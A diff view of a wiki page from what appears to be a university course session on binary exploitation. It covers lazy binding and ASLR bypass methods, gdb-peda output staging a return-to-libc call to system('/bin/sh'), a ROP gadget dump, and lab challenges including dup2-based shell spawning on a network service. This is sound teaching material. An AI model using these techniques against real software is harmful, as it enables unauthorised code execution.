 +   0x08048445 <+9>: mov    DWORD PTR [esp+0x8],0x64 
 +   0x0804844d <+17>: lea    eax,[esp+0x19] 
 +   0x08048451 <+21>: mov    DWORD PTR [esp+0x4],eax 
 +   0x08048455 <+25>: mov    DWORD PTR [esp],0x0 
 +   0x0804845c <+32>: call   0x8048310 <read@plt> 
 +   0x08048461 <+37>: mov    eax,0x0 
 +   0x08048466 <+42>: leave   
 +   0x08048467 <+43>: ret     
 +End of assembler dump. 
 +gdb-peda$ b *0x08048467 
 +Breakpoint 1 at 0x8048467
-<code text> 
-080482e0 <puts@plt-0x10>: 
- 80482e0: ff 35 f8 9f 04 08    push   DWORD PTR ds:0x8049ff8 
- 80482e6: ff 25 fc 9f 04 08    jmp    DWORD PTR ds:0x8049ffc 
- 80482ec: 00 00                add    BYTE PTR [eax],al 
-Going further into the resolver is left as an exercise. You can use GDB to inspect the address in ''0x8049ffc'', and what happens when this jumps there. +[----------------------------------registers-----------------------------------] 
-</note>+EAX: 0x0  
 +EBX: 0xf7f97e54 --0x1a6d5c  
 +ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA\n\300\317\377\367\034"
 +EDX: 0x64 ('d'
 +ESI: 0x0  
 +EDI: 0x0  
 +EBP: 0x41334141 ('AA3A'
 +ESP: 0xffffcd6c ("AEAAeAA4AAFAAfA\n\300\317\377\367\034"
 +EIP: 0x8048467 (<main+43>: ret) 
 +EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) 
 +   0x8048445 <main+9>: mov    DWORD PTR [esp+0x8],0x64 
 +   0x804844d <main+17>: lea    eax,[esp+0x19] 
 +   0x8048451 <main+21>: mov    DWORD PTR [esp+0x4],eax 
 +   0x8048455 <main+25>: mov    DWORD PTR [esp],0x0 
 +   0x804845c <main+32>: call   0x8048310 <read@plt> 
 +   0x8048461 <main+37>: mov    eax,0x0 
 +   0x8048466 <main+42>: leave   
 +=> 0x8048467 <main+43>: ret     
 +   0x8048468: xchg   ax,ax 
 +   0x804846a: xchg   ax,ax 
 +   0x804846c: xchg   ax,ax 
 +   0x804846e: xchg   ax,ax 
 +   0x8048470 <__libc_csu_init>: push   ebp 
 +   0x8048471 <__libc_csu_init+1>: push   edi 
 +   0x8048472 <__libc_csu_init+2>: xor    edi,edi 
 +   0x8048474 <__libc_csu_init+4>: push   esi 
 +0000| 0xffffcd6c --> 0xf7e333e0 (<system>: sub    esp,0x1c) 
 +0004| 0xffffcd70 --> 0x80484cf (<__libc_csu_init+95>: pop    ebp) 
 +0008| 0xffffcd74 --> 0xf7f56be6 ("/bin/sh"
 +0012| 0xffffcd78 --> 0xf7e25c00 (<exit>: push   ebx)
-What's going on here? What's actually happening is //lazy binding// — by convention when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOT. Therefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, it simply jumps to the next instruction. The identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out "hey, this program is trying to find the function foo". It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stub. Ingenious! 
-=== Bypassing ASLR+gdb-peda$ patto AEAAeAA4AAFAAfA 
 +AEAAeAA4AAFAAfA found at offset: 35 
-**Bruteforce.** If you are able to inject payloads multiple times without crashing the application, you can bruteforce the address you are interested in (e.g., a target in libc). Otherwise, you can just run the exploit multiple times.+Then you can break on all called functions or step as needed to see if the payload is doing what you want it to.
-**NOP sled.** In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and eventually reaching the exploit code even if the stack address is randomized. This is not very useful when we are interested in jumping to ''libc'' or other functions, which is usually the case if the executable space protection is also active. 
-**jmp esp.** This will basically jump into the stack, no matter where it is mapped. It's actually a very rudimentary form of Return Oriented Programming which is going to be discussed in a following session.+=== checksec in peda === 
 +<code bash> 
 +gdb-peda$ checksec 
 +CANARY    : disabled 
 +FORTIFY   : disabled 
 +NX        : ENABLED 
 +PIE       : disabled 
 +RELRO     : Partial 
-**Restrict entropy.** There are various ways of reducing the entropy of the randomized address. For example, you can decrease the initial stack size by setting a huge amount of dummy environment variables. 
-**Information leak.** The most effective way of bypassing ASLR is by using an information leak vulnerability that exposes randomized addressor at least parts of them. You can also dump parts of libraries (e.g., ''libc'') if you are able to create an exploit that reads themThis is useful in remote attacks to infer the version of the librarydownloading it from the weband thus knowing the right offsets for other functions (not originally linked with the binary).+=== gadget finding in peda === 
 +Apart from **objdump** which only finds aligned instructionsyou can also use **dumprop** in peda to find all gadgets in a memory region or mapping: 
 +<code bash> 
 +gdb-peda$ start 
 +gdb-peda$ dumprop 
 +Warning: this can be very slowdo not run for large memory range 
 +Writing ROP gadgets to file: a-rop.txt ... 
 +0x8048467: ret 
 +0x804835d: iret 
 +0x804838f: repz ret 
 +0x80483be: ret 0xeac1 
 +0x80483a9: leave; ret 
 +0x80485b4: inc ecx; ret 
 +0x80484cf: pop ebp; ret 
 +0x80482f5: pop ebx; ret 
 +0x80484df: nop; repz ret 
 +0x80483a8: ror cl,1; ret 
 +0x804838e: add dh,bl; ret 
 +0x80483e5: ror cl,cl; ret 
 +0x8048465: add cl,cl; ret 
 +0x804840b: leave; repz ret 
 +0x8048371: sbb al,0x24; ret 
 +0x80485b3: adc al,0x41; ret 
 +0x8048370: mov ebx,[esp]; ret 
 +0x80484de: nop; nop; repz ret 
 +0x80483a7: call eax; leave; ret 
 +0x80483e4: call edx; leave; ret 
 +0x804840a: add ecx,ecx; repz ret 
 +0x80484ce: pop edi; pop ebp; ret 
-=== Toolsltrace+Something finer is: 
 +<code bash> 
 +gdb-peda$ asmsearch "pop ? ; ret" 
 +0x080482f5 : (5bc3) pop    ebx; ret 
 +0x080484cf : (5dc3) pop    ebp; ret 
 +0x080484f6 : (5bc3) pop    ebx; ret
-We are going to use ''ltrace'' to catch library function invocations. +gdb-peda$ asmsearch "pop ? ; pop ? ; ret" 
 +0x080484ce : (5f5dc3) pop    edi; pop    ebp; ret 
 +gdb-peda$ asmsearch "call ?" 
 +0x080483a7 : (ffd0) call   eax 
 +0x080483e4 : (ffd2) call   edx 
 +0x0804842f : (ffd0) call   eax
-python -c 'print "MY_L33T_ATTACK_STR1NG"' | ltrace -i ./vulnbinary 2>&1 
 </code> </code>
-If you are more comfortable with another tool feel free to use itKeep in mind that sometimes addresses change when you are using ''GDB''.+=== Anti-anti-debugging and others === 
 +There can be various annoyances in binaries: **ptrace** calls for anti-debugging, **sleep** calls to prevent bruteforcing or **fork** calls to use child processes to serve requests. 
 +These can all be deactivated using **unptrace** (for ptrace) and **deactive** in peda. 
 +===== Challenges =====
-=== 00. Tutorial - Bypass NX Stack with return-to-libc+==== 00. Tutorial - Bypass NX Stack with return-to-libc ====
 Go to the ''01-tutorial-ret-to-libc/'' folder in the [[|activities archive]]. Go to the ''01-tutorial-ret-to-libc/'' folder in the [[|activities archive]].
Line 395: Line 702:
 </code> </code>
-== Challenges 
-=== 01. Challenge - ret-to-libc+==== 01. Challenge - ret-to-libc ====
 Looks good! Let's get serious and do something useful with this. Looks good! Let's get serious and do something useful with this.
Line 420: Line 726:
 </note> </note>
-=== 02. Challenge - no-ret-control+==== 02. Challenge - no-ret-control ====
 Go to the ''02-challenge-no-ret-control/'' folder in the [[|activities archive]]. Go to the ''02-challenge-no-ret-control/'' folder in the [[|activities archive]].
Line 428: Line 734:
 Alter the execution of ''force_exit'', in order to call the secret function. Alter the execution of ''force_exit'', in order to call the secret function.
-=== 03. Challenge - ret-to-plt+==== 03. Challenge - ret-to-plt ====
 Go to the ''03-challenge-ret-to-plt/'' folder in the [[|activities archive]]. Go to the ''03-challenge-ret-to-plt/'' folder in the [[|activities archive]].
Line 485: Line 791:
 **Bonus**: The process should SEGFAULT after printing the second (constant) number. Make it exit cleanly (the exit code does not matter, just no SIGSEGV). **Bonus**: The process should SEGFAULT after printing the second (constant) number. Make it exit cleanly (the exit code does not matter, just no SIGSEGV).
-=== 04. Challenge - colors 
-Go to the ''04-challenge-colors/'' folder in the [[|activities archive]].+==== 04. Challenge Gadget tutorial ====
-<note important+This task requires you to construct a payload using gadgets and calling the functions inside such that it will print 
-//Hint//If you are going to use an inline python command, stdin will get closed and the new shell will have nothing to readUse cat to concatenate your attack string with stdin like this: ''%%cat <(python -c 'print "L33T_ATTACK"') - ./vulnbinary%%'' +<code
 +stage A!stage B! 
 +Make it also print the messages in reverse order: 
 +stage B!stage A! 
 +==== Bonus Challenge - Echo service ==== 
 +This task is a network service that can be exploited. Run it locally and try to exploit itYou'll find that if you call system("/bin/sh"the shell is opened in the terminal where the server was started instead of the one where the attack takes place. This happens because the client-server communication takes place over a socketWhen you spawn a shell it will inherit the Standard I/O descriptors from the parent and use those. To fix this you need to redirect the socket fd into 0,1 (and optionally 2).
-===== 04.a.+So you will need to do the equivalent of the following in ROP chain: 
 +<code c> 
 + dup2(sockfd, 1); 
 + dup2(sockfd, 0); 
 + system("/bin/sh"); 
-Exploit the ''colors'' binary and call ''system()''. Disregard the string parameter of ''system()'' for now. 
-===== 04.b. +Exploit it first with ASLR disabled and then enabled.
- +
-ASLR still disabled. Call ''%%system("blue")%%''. Get a shell with this. //Hint//: Where will it search for the "blue" command? +
- +
-===== 04.c. +
- +
-Again, ASLR disabled. Call ''%%system("/bin/sh")%%'' without using the previous trick. +
- +
- +
-=== 05. Challenge - bruteforce +
- +
-Continue working in the ''04-challenge-colors/'' folder in the [[|activities archive]]. +
- +
-Try the previous exploit with ASLR enabled. You can rerun the binary multiple times. +
- +
-<note important> +
-Figure out how addresses look like using ''LD_TRACE_LOADED_OBJECTS=whatever ./colors'' multiple times. How many bits do change? Run the program multiple times with some fixed addresses for ''system'' and ''/bin/bash'' in the payload.  +
-</note> +
- +
-<note> +
-The ASLR entropy on 32-bit systems if pretty low, which makes this bruteforce attack feasible. On 64-bit platforms you will need an information leak, and a 2-stage exploit. We are going to discuss this in a future session. +
-</note> +
- +
-=== 06. Challenge - mprotect +
- +
-Go to either the ''03-challenge-ret-to-plt/'' or ''04-challenge-colors/'' folder in the [[|activities archive]]. +
- +
-Using any of the 2 binaries, try to call ''mprotect()'' in order to change the protection flags of the stack, then inject a shellcode similar to the ones in the [[session:10|previous session]]. +
- +
-<note important> +
-To make your life easier, you can disable ASLR. The purpose of this task is to bypass NX, and not ASLR. +
-</note> +
- +
-<note important> +
-//Hint//: The ''ulimit -s'' unlimited trick will make the stack get mapped at a fixed address. +
session/09.1562260594.txt.gz · Last modified: 2019/07/04 20:16 by Razvan Deaconescu